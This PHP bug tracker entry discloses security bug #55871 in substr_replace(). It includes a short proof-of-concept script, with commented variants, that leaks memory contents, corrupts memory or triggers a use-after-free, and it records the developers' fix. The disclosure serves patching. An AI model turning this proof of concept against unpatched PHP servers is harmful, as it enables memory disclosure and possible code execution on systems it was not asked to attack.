php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #55871 Interruption in substr_replace()
Submitted: 2011-10-08 09:38 UTC Modified: 2015-04-26 12:52 UTC
From: worawita at gmail dot com Assigned: stas (profile)
Status: Closed Package: Strings related
PHP Version: 5.3 OS: *
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: worawita at gmail dot com
New email:
PHP Version: OS:

 

 [2011-10-08 09:38 UTC] worawita at gmail dot com 
Description:
------------
substr_replace() function can be interrupted and used for information leakage/memory corruption/use-after-free(>=5.3.7) due to pass by reference in array.
The below test script causes "Segmentation Fault" in PHP with Suhosin patch.

Test script:
---------------
<?php

class dummy {
	public function __toString() {
		//$GLOBALS['my_var'] += 0x08048000; // dump memory at 0x08048000
		//$GLOBALS['my_var'] .= 'AAAAAAAA'; // memory corruption
		preg_match('//', '', $GLOBALS['my_var']); // dump HashTable data (and use-after-free in >=5.3.7)
		return '';
	}
}

$my_var = str_repeat('A', 40);
$out = substr_replace(array(&$my_var), array(new dummy), 40, 0);
var_dump($out);

Expected result:
----------------
array(1) {
  [0]=>
  string(40) "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}

Actual result:
--------------
array(1) {
  [0]=>
  string(40)       ☺   ☺ ≥ò≥ò≥ò☻└±ò☻@δKk  ☺t"
}

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2012-01-02 00:47 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2012-01-02 00:47 UTC] stas@php.net 
This bug has been fixed in SVN.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2012-01-09 13:30 UTC] worawita at gmail dot com 
still not be fixed in 5.3 branch
 [2012-03-13 07:26 UTC] stas@php.net
-Status: Closed +Status: Re-Opened -PHP Version: Irrelevant +PHP Version: 5.3
 [2012-04-18 09:46 UTC] laruence@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e2a2ed348f6a238c1e43eb01e2e0aa5a70b217c2
Log: fix bug #55871 - Interruption in substr_replace()
 [2012-05-13 15:13 UTC] felipe@php.net
-Status: Re-Opened +Status: Assigned -Private report: No +Private report: Yes
 [2012-07-04 11:37 UTC] felipe@php.net
-Status: Assigned +Status: Closed
 [2012-07-04 11:37 UTC] felipe@php.net 
This bug has been fixed in SVN.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Closing.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 09:01:32 2024 UTC